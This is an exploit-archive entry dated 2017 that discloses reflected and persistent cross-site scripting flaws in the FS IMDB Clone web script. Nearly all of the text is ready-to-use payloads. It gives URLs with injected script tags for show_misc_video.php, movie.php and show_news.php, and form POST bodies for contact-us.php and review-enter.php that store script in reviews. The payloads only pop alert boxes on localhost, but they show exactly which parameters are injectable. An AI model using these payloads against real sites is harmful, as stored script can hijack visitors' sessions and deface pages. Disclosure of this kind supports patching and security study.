id: 29139
date: 12/06/2017
title: FS IMDB Clone -  XSS REFLECTED/PERSISTENT Vulnerabilties
author: Dan°
cves: 

# Exploit Title: FS IMDB Clone -  XSS REFLECTED/PERSISTENT
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/imdb-clone/
# Version: 2017-12-06
# Tested on: Kali Linux 2.0

PAYLOAD REFLECTED:
payload[1]: http://localhost/show_misc_video.php?id=<script>alert('Dan°');</script>
payload[2]:  http://localhost/movie.php?f=1"><script>alert('Dan°');</script>
payload[3]:  http://localhost/show_news.php?id=1"><script>alert('Dan°');</script>
payload[4]: http://localhost/contact-us.php 
Form Email: "><script>alert('Dan°');</script>
"cu_name=&cu_telephone=&cu_email="><script>alert('Dan°');</script>
&cu_comments=&submitbutton=Contact"

PAYLOAD PERSISTENT:
payload[1]: http://localhost/review-enter.php?f=1 
Form Summery: "><script>alert('campo1');</script>  
Form Review: "><script>alert('campo2');</script> 
"id=1&page=movie.php&usr_id=1&summary="><script>alert('campo1');</script>&vote=&review="><script>alert('campo2');</script> ++&action_preview=Preview"


#  0day.today [2023-03-25]  #